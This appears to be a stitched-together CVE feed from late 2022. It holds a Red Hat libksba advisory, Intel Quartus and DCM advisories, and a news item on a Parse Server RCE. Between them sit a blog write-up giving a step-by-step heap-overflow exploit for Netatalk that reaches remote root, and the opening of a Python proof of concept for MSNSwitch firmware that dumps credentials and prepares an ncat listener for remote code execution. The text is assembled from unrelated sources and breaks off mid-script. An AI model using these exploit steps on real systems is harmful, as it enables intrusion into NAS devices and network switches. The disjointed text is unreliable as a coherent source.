An update for libksba is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-3515: libksba: integer overflow may lead to remote code execution


**Synopsis**

Important: libksba security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for libksba is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

KSBA (pronounced Kasbah) is a library to make X.509 certificates as well as the CMS easily accessible by other applications. Both specifications are building blocks of S/MIME and TLS.  

Security Fix(es):  

*   libksba: integer overflow may lead to remote code execution (CVE-2022-3515)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.4 x86\_64
*   Red Hat Enterprise Linux Server - AUS 8.4 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.4 s390x
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.4 ppc64le
*   Red Hat Enterprise Linux Server - TUS 8.4 x86\_64
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.4 aarch64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.4 x86\_64
*   Red Hat CodeReady Linux Builder for x86\_64 - Extended Update Support 8.4 x86\_64
*   Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 8.4 ppc64le
*   Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 8.4 s390x
*   Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 8.4 aarch64

**Fixes**

*   BZ - 2135610 - CVE-2022-3515 libksba: integer overflow may lead to remote code execution

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

x86\_64

libksba-1.3.5-8.el8\_4.i686.rpm

SHA-256: d4054b24a408ba2cce531dd04387056b08372be6f7fa766d6db7c3ba7ae36d01

libksba-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: fe12dd682bdfa1af7995ba11e919bc7181f841915e31c9f147b83ddf8bc8a662

libksba-debuginfo-1.3.5-8.el8\_4.i686.rpm

SHA-256: 85a0d4f9cca9fc3f4bc41ebbb76a7daf5626fe198dec4218e3c37a74bb29fb48

libksba-debuginfo-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 11baceaa702dc4a59c83a1a73230a351f79a65690261599785aee986142a7df2

libksba-debugsource-1.3.5-8.el8\_4.i686.rpm

SHA-256: 1f0d69d85ab84873f01936ea49f3cd249ff7a882dece1bbf8720870f82fff33a

libksba-debugsource-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 7ebf11d1896e580e12ef2029ed91538adb3c6be3c39dc85203e846c6972dd5ca

**Red Hat Enterprise Linux Server - AUS 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

x86\_64

libksba-1.3.5-8.el8\_4.i686.rpm

SHA-256: d4054b24a408ba2cce531dd04387056b08372be6f7fa766d6db7c3ba7ae36d01

libksba-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: fe12dd682bdfa1af7995ba11e919bc7181f841915e31c9f147b83ddf8bc8a662

libksba-debuginfo-1.3.5-8.el8\_4.i686.rpm

SHA-256: 85a0d4f9cca9fc3f4bc41ebbb76a7daf5626fe198dec4218e3c37a74bb29fb48

libksba-debuginfo-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 11baceaa702dc4a59c83a1a73230a351f79a65690261599785aee986142a7df2

libksba-debugsource-1.3.5-8.el8\_4.i686.rpm

SHA-256: 1f0d69d85ab84873f01936ea49f3cd249ff7a882dece1bbf8720870f82fff33a

libksba-debugsource-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 7ebf11d1896e580e12ef2029ed91538adb3c6be3c39dc85203e846c6972dd5ca

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

s390x

libksba-1.3.5-8.el8\_4.s390x.rpm

SHA-256: 1dfaa89a907e69e8d7406ce2b9e8b0931f650d4d41dde879b00f8969f0f4e8b2

libksba-debuginfo-1.3.5-8.el8\_4.s390x.rpm

SHA-256: 5796702bdaff8ddbb392237c219a8bc96f9178353956d3b78e65aee60c3d743d

libksba-debugsource-1.3.5-8.el8\_4.s390x.rpm

SHA-256: 5a9b2de1d262ad555fb1a248a95bbef6197dc31ec0a29ec7c80dee4a77a0c590

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

ppc64le

libksba-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 2de55b93c78a70587a211d9aa59eab70a4b55590328813eb1380ef1fbf348250

libksba-debuginfo-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: aad1b833c67bec88256d873c7e31f014034d9b6df1e6447ae9cbc54fbefc2ab0

libksba-debugsource-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 64e71d08b7506a85bfa51ca637fa9e9ce15d105c610f23af4c84d16fdd975ab3

**Red Hat Enterprise Linux Server - TUS 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

x86\_64

libksba-1.3.5-8.el8\_4.i686.rpm

SHA-256: d4054b24a408ba2cce531dd04387056b08372be6f7fa766d6db7c3ba7ae36d01

libksba-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: fe12dd682bdfa1af7995ba11e919bc7181f841915e31c9f147b83ddf8bc8a662

libksba-debuginfo-1.3.5-8.el8\_4.i686.rpm

SHA-256: 85a0d4f9cca9fc3f4bc41ebbb76a7daf5626fe198dec4218e3c37a74bb29fb48

libksba-debuginfo-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 11baceaa702dc4a59c83a1a73230a351f79a65690261599785aee986142a7df2

libksba-debugsource-1.3.5-8.el8\_4.i686.rpm

SHA-256: 1f0d69d85ab84873f01936ea49f3cd249ff7a882dece1bbf8720870f82fff33a

libksba-debugsource-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 7ebf11d1896e580e12ef2029ed91538adb3c6be3c39dc85203e846c6972dd5ca

**Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

aarch64

libksba-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 8f9bc2797079e6596808cf6d8276d5e53dea9cdf276c7e9248fe6ecf18c84483

libksba-debuginfo-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 27cfc3a9ceab0983aa081fa68362cd65f97c367065c75d4d893fb53953f7848d

libksba-debugsource-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 0acd9ec179ea9903ea59c805d0ca338320b7295ed9813537050d5109d1f1c340

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

ppc64le

libksba-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 2de55b93c78a70587a211d9aa59eab70a4b55590328813eb1380ef1fbf348250

libksba-debuginfo-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: aad1b833c67bec88256d873c7e31f014034d9b6df1e6447ae9cbc54fbefc2ab0

libksba-debugsource-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 64e71d08b7506a85bfa51ca637fa9e9ce15d105c610f23af4c84d16fdd975ab3

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.4**

SRPM

libksba-1.3.5-8.el8\_4.src.rpm

SHA-256: 5b40620b05c94dbf77414c8f71fcda37d6cff35aa1ed5bdcd5cb68b9c0cd1438

x86\_64

libksba-1.3.5-8.el8\_4.i686.rpm

SHA-256: d4054b24a408ba2cce531dd04387056b08372be6f7fa766d6db7c3ba7ae36d01

libksba-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: fe12dd682bdfa1af7995ba11e919bc7181f841915e31c9f147b83ddf8bc8a662

libksba-debuginfo-1.3.5-8.el8\_4.i686.rpm

SHA-256: 85a0d4f9cca9fc3f4bc41ebbb76a7daf5626fe198dec4218e3c37a74bb29fb48

libksba-debuginfo-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 11baceaa702dc4a59c83a1a73230a351f79a65690261599785aee986142a7df2

libksba-debugsource-1.3.5-8.el8\_4.i686.rpm

SHA-256: 1f0d69d85ab84873f01936ea49f3cd249ff7a882dece1bbf8720870f82fff33a

libksba-debugsource-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 7ebf11d1896e580e12ef2029ed91538adb3c6be3c39dc85203e846c6972dd5ca

**Red Hat CodeReady Linux Builder for x86\_64 - Extended Update Support 8.4**

SRPM

x86\_64

libksba-debuginfo-1.3.5-8.el8\_4.i686.rpm

SHA-256: 85a0d4f9cca9fc3f4bc41ebbb76a7daf5626fe198dec4218e3c37a74bb29fb48

libksba-debuginfo-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 11baceaa702dc4a59c83a1a73230a351f79a65690261599785aee986142a7df2

libksba-debugsource-1.3.5-8.el8\_4.i686.rpm

SHA-256: 1f0d69d85ab84873f01936ea49f3cd249ff7a882dece1bbf8720870f82fff33a

libksba-debugsource-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 7ebf11d1896e580e12ef2029ed91538adb3c6be3c39dc85203e846c6972dd5ca

libksba-devel-1.3.5-8.el8\_4.i686.rpm

SHA-256: eb28471c601515d9697226e1ba1d25cc99244387b9a156126c55b8a219219f45

libksba-devel-1.3.5-8.el8\_4.x86\_64.rpm

SHA-256: 22b129a00028d4c210d4a28e222aee37c3250a1e31817b69527920962cd4b2b1

**Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 8.4**

SRPM

ppc64le

libksba-debuginfo-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: aad1b833c67bec88256d873c7e31f014034d9b6df1e6447ae9cbc54fbefc2ab0

libksba-debugsource-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 64e71d08b7506a85bfa51ca637fa9e9ce15d105c610f23af4c84d16fdd975ab3

libksba-devel-1.3.5-8.el8\_4.ppc64le.rpm

SHA-256: 222480f8679ea043964c3d46bb9e2065c746dfb608e75351a87894305eff4109

**Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 8.4**

SRPM

s390x

libksba-debuginfo-1.3.5-8.el8\_4.s390x.rpm

SHA-256: 5796702bdaff8ddbb392237c219a8bc96f9178353956d3b78e65aee60c3d743d

libksba-debugsource-1.3.5-8.el8\_4.s390x.rpm

SHA-256: 5a9b2de1d262ad555fb1a248a95bbef6197dc31ec0a29ec7c80dee4a77a0c590

libksba-devel-1.3.5-8.el8\_4.s390x.rpm

SHA-256: af9d28fa0ccb458b5a34745ae855aa96df92a4a8e67648f9968e07deda500f1a

**Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 8.4**

SRPM

aarch64

libksba-debuginfo-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 27cfc3a9ceab0983aa081fa68362cd65f97c367065c75d4d893fb53953f7848d

libksba-debugsource-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 0acd9ec179ea9903ea59c805d0ca338320b7295ed9813537050d5109d1f1c340

libksba-devel-1.3.5-8.el8\_4.aarch64.rpm

SHA-256: 1c9d2635cb0bbadfa1e4712d143764acea61fe7e0460c9ec7b496b8c41e8e014

RHSA-2022:7927: Red Hat Security Advisory: libksba security update

Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).

5 minute read

**TL;DR**

Hi all, This is my first blog in this page. Actually this is my second blog, but first one is missed on the previous website. I will push it again in this page. Please feed free comment or create issue in github if you detect my misstakes.

**Overview**

Oftenly, I found a product from pwn2own to audit. I found an amazing blog which discription about CVE-2022-23121 in Pwn2own. I tried to audit the source code of Netatalk 3.1.13 to understand the vulnerability clearly. Of couse with a hope to find a new vulnerability for next Pwn2own.

**Vulnerability**

When finding new bug, I often focus to memory corruption, so I find some function like memcpy, strcpy, … Because the Netatalalk works with specific protocol (AFP) and file formats. Moreover, CVE-2022-23121 occurs when parsing .AppleDouble file. Therefore I found some other file format and found .appl. The function to read .appl file is afp_getappl:

        /* fake up a cname */
        cbuf = obj->newtmp;
        q = cbuf;
        *q++ = 2;	/* long path type */
        *q++ = (unsigned char)len;
        memcpy( q, p, len );
    

afp_getappl also has:

        buf = obj->oldtmp;
        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
                            + sizeof( u_short ))) > 0 ) {
            p = buf + sizeof( appltag );
            memcpy( &len, p, sizeof( len ));
            len = ntohs( len );
            p += sizeof( u_short );
            if (( cc = read( sa.sdt_fd, p, len )) < len ) {
                break;
            }
            if ( sa.sdt_index == aindex ) {
                break;
            }
            sa.sdt_index++;
        }
        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
        sa.sdt_index++;
    

We can see len variable parse from 2 bytes (u_short types) and read len bytes to some buffer afterward. we also need understand obj (is object of AFPObj):

    typedef struct AFPObj {
        const char *cmdlineconfigfile;
        int cmdlineflags;
        const void *signature;
        struct DSI *dsi;
        struct afp_options options;
        dictionary *iniconfig;
        char username[MAXUSERLEN];
        /* to prevent confusion, only use these in afp_* calls */
        char oldtmp[AFPOBJ_TMPSIZ + 1], newtmp[AFPOBJ_TMPSIZ + 1];
        void *uam_cookie; /* cookie for uams */
        struct session_info  sinfo;
        uid_t uid;  /* client login user id */
        uid_t euid; /* client effective process user id */
        int ipc_fd; /* anonymous PF_UNIX socket for IPC with afpd parent */
        gid_t *groups;
        int ngroups;
        int afp_version;
        int cnx_cnt, cnx_max;
        /* Functions */
        void (*logout)(void);
        void (*exit)(int);
        int (*reply)(void *, int);
        int (*attention)(void *, AFPUserBytes);
        int fce_version;
        char *fce_ign_names;
        char *fce_notify_script;
        struct sl_ctx *sl_ctx;
    } AFPObj;
    

with AFPOBJ_TMPSIZ is 4096 as default, len is 0xffff as max, so we have a heap-based buffer overflow at here.

**Exploit**

Between parsing len and call memcpy like above, afp_getappl have one more piece:

       {
    #define hextoint( c )	( isdigit( c ) ? c - '0' : c + 10 - 'a' )
    #define islxdigit(x)	(!isupper(x)&&isxdigit(x))
    
            char	utomname[ MAXPATHLEN + 1];
            char		*u, *m;
            int		i, h;
    
            u = p;
            m = utomname;
            i = len;
            while ( i ) {
                if ( *u == ':' && *(u+1) != '\0' && islxdigit( *(u+1)) &&
                        *(u+2) != '\0' && islxdigit( *(u+2))) {
                    ++u, --i;
                    h = hextoint( *u ) << 4;
                    ++u, --i;
                    h |= hextoint( *u );
                    *m++ = h;
                } else {
                    *m++ = *u;
                }
                ++u, --i;
            }
    
            len = m - utomname;
            p = utomname;
    
            if ( p[ len - 1 ] == '\0' ) {
                len--;
            }
        }
    

Basically, the above code will copy and decode byte by byte from p to a buffer in stack. If I exploit stack buffer overflow in m to override return address, overlap memory will be occured. Therefore so hard to control addresses. Therefore, I tried to find to bypass it.

I decided using

        while (( cc = read( sa.sdt_fd, buf, sizeof( appltag )
            ...
            if (( cc = read( sa.sdt_fd, p, len )) < len ) 
    

to overflow buffer p (point to obj->oldtmp + 6) in the first piece code which I showed above and using

        if ( cc <= 0 || sa.sdt_index != aindex ) {
            *rbuflen = 0;
            return( AFPERR_NOITEM );
        }
    

to break loop and exit function without reaching decoding byte to byte. Becasue aindex is parsed from AFP packet, I try to set it to some values (different 0 and 1) and it worked :))).

Finally, we need trigger shell and run command, I do not use any House of ... because I am so noob :((, so I tried to override address at end of AFPObj. In first try, I tried override reply or exit function pointer in obj. I found send_reply function call:

        obj->reply(obj->dsi, err);
        obj->exit(0);
    

But noway to control argument. Luckily I found that send_fce_event function will check obj->fce_notify_script and run command:

        bstring cmd = bformat("%s -v %d -e %s -i %" PRIu32 "",
                              obj->fce_notify_script,
                              FCE_PACKET_VERSION,
                              fce_event_names[event],
                              event_id);
        (void)afprun_bg(1, bdata(cmd));
    

and afprun_bg:

    int afprun_bg(int root, char *cmd){
        ...
        execl("/bin/sh","sh","-c", cmd, NULL);
        ...
    

I override the *fce_notify_script with pointer which point to command. It is easy to indentify because AFPObj is saved on .bss segment.

**Exploit strategy**

I found that .appl file will be stored in current sharing dictionary if having config (vol dbnest = yes) and it is default setting in FreeBSD. It means, this is RCE vulnerability in FreeBSD and LPE in other OS. I create a demo in TrueNAS with guest allow and SMB enable.

Checksec of afpd:

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x200000)
        RUNPATH:  b'/usr/local/lib'
    

1.  Create pre .appl file with:
    *   len is over 4096 and contain length of command and padding in AFPObj ( = (fce_off+8*3).to_bytes(2, 'big'))
    *   command to run
    *   padding with \x00 in fce_off-len(cmd) times.
    *   fce_version is 1
    *   address point command.
2.  using SMB to update and modify the .appl file in local in ./AppleDouble/<x>/<xyzt>.appl
3.  Send AFP packet afp_getappl with aindex is a big number (like 10, 15)
4.  Trigger excute command send AFP packet afp_logout

**Conclusion**

With hoping get a bounty because Netatalk appeared in Pwn2own 2021, I tried report this vulnerability to zdi, TrueNAS, Synology. But noone resolve this. After a half of year, I decided public this blog and no bounty :((.

CVE-2022-45188: [1day to 0day] Netatalk from Pwn2own 2021 to 0x00 cent in 2022

Uncontrolled search path element in the Intel(R) Quartus Prime Standard edition software before version 21.1 Patch 0.02std may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Quartus® Advisory**

Intel ID:

INTEL-SA-00659

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Information Disclosure

Severity rating:

MEDIUM

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in the Intel® Quartus Prime Pro and Standard edition software may allow escalation of privilege or information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-27187

Description: Uncontrolled search path element in the Intel(R) Quartus Prime Standard edition software before version 21.1 Patch 0.02std may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVEID: CVE-2022-27233

Description: XML injection in the Intel(R) Quartus Prime Pro and Standard edition software may allow an unauthenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**Affected Products:**

Intel® Quartus Prime Pro edition software before version 22.1.

Intel® Quartus Prime Standard edition software before version 21.1 Patch 0.02std.

**Recommendations:**

Intel recommends updating the Intel® Quartus Prime Pro edition software to version 22.1 or later.

Intel recommends updating the Intel® Quartus Prime Standard edition software to version 21.1 Patch 0.02std or later.

Updates are available for download at these locations:

http://fpgasoftware.intel.com/?edition=pro

http://fpgasoftware.intel.com/?edition=standard

**Acknowledgements:**

Intel would like to thank avivanoa (CVE-2022-27187), Julien Ahrens from RCE Security (CVE-2022-27233) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27187: INTEL-SA-00659

Protection mechanism failure in the Intel(R) DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® DCM Advisory**

**Summary:**

A potential security vulnerability in the Intel® Data Center Manager (DCM) software may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-33942

Description: Protection mechanism failure in the Intel(R) DCM software before version 5.0 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

**Affected Products:**

Intel® DCM software before version 5.0.

**Recommendation:**

Intel recommends updating the Intel® DCM software to version 5.0 or later.

Updates are available for download at this location: https://www.intel.com/content/www/us/en/download/645992

**Acknowledgements:**

Intel would like to thank Julien Ahrens from RCE Security for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-33942: INTEL-SA-00713

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

Adam Bannister 11 November 2022 at 15:37 UTC

Bug emerges from ambition to find ‘end-to-end exploits beyond DoS’

A prototype pollution vulnerability that could lead to remote code execution (RCE) in Parse Server has been patched.

An attacker could potentially trigger RCE through the MongoDB BSON \[Binary JSON\] parser by leveraging the flaw (CVE-2022-39396), according to a GitHub security advisory published on November 8.

Parse Server is a popular, open source API server module for Node.js that provides push notification functionality for iOS, macOS, Android, and tvOS.

BACKGROUND Prototype pollution: A dangerous and underrated vulnerability impacting JavaScript applications

Although the security researchers involved are withholding technical details to give developers time to apply patches, so the detail remains unclear, we know the bug is comparable to another prototype pollution-to-RCE issue they disclosed earlier in the year. That vulnerability – which surfaced in March 2022 – was given the highest possible severity rating of CVSS 10.

**Patch now**

“I can confirm that both vulnerabilities have the highest impact because they affect the default configuration of Parse Server and allow an attacker to control the system remotely without any authentication,” Mikhail Shcherbakov, a researcher from the KTH Royal Institute of Technology in Stockholm, told The Daily Swig. “So my advice is to patch Parse Server ASAP, if you have it.”

The flaw has been patched in the NPM parse-server package in versions 4.10.18 and 5.3.1.

The patches prevent prototype pollution in the MongoDB database adapter. If updates cannot be applied immediately, then users can protect themselves in the meantime by disabling RCE through the MongoDB BSON parser.

**‘Complex task’**

The flaw was discovered during a research project undertaken by Shcherbakov, KTH colleague Musard Balliu, and Cristian-Alexandru Staicu from the Helmholtz Center for Information Security (CISPA) in Saarbrücken, Germany.

The trio investigated how prototype pollution vulnerabilities in Node.js systems might lead to RCE attacks.

“The detection of prototype pollution is a complex task,” said Shcherbakov. “However, the exploitation that demonstrates a high impact of vulnerabilities is more complicated in practice but still possible.”

The researchers have presented their findings, which also feature Node.js targets NPM CLI and Rocket.Chat, in a white paper (PDF). They are due to present their research at the USENIX Security ’23 conference.

**Universal gadgets**

Prototype pollution, which affects Node.js and prototype-based languages like JavaScript, involves injecting “properties into an object’s root prototype at runtime \[to\] subsequently trigger the execution of legitimate code gadgets that access these properties on the object’s prototype,” explains the presentation precis.

The researchers set out to find “end-to-end exploits beyond DoS in full-fledged Node.js applications”, and “the first multi-staged framework that uses multi-label static taint analysis to identify prototype pollution in Node.js libraries and applications, as well as a hybrid approach to detect universal gadgets”.

Technical details for the Parse Server RCE will eventually be disclosed via the Trend Micro Zero Day Initiative (ZDI) blog.

Other significant security bugs addressed in Parse Server this year include an issue that enabled brute-force guessing of sensitive user data, and a high severity authentication bypass impacting Apple Game Center.

RELATED Prototype pollution bug exposed Ember.js applications to XSS

Prototype pollution project yields another Parse Server RCE

MSNSwitch Firmware MNT.2408 suffers from a remote code execution vulnerability.

    Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)Google Dork: n/aDate:9/1/2022Exploit Author: Eli FulkersonVendor Homepage: https://www.msnswitch.com/Version: MNT.2408Tested on: MNT.2408 firmwareCVE: CVE-2022-32429#!/usr/bin/python3"""POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.Configuration dump only requires HTTP access.Full RCE requires you to be on the same subnet as the device.""" import requestsimport sysimport urllib.parseimport readlineimport randomimport string# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOSTLISTENER_HOST = "192.168.EDIT.ME"LISTENER_PORT = 3434# target msnswitchTARGET="192.168.EDIT.ME2"PORT=80USERNAME = NonePASSWORD = None"""First vulnerability, unauthenticated configuration/credential dump"""if USERNAME == None or PASSWORD == None:  # lets just ask  hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"  session = requests.session()  data = session.get(hack_url)  for each in data.text.split('\n'):    key = None    val = None    try:      key = each.strip().split('=')[0]      val = each.strip().split('=')[1]    except:      pass    if key == "Account1":      USERNAME = val    if 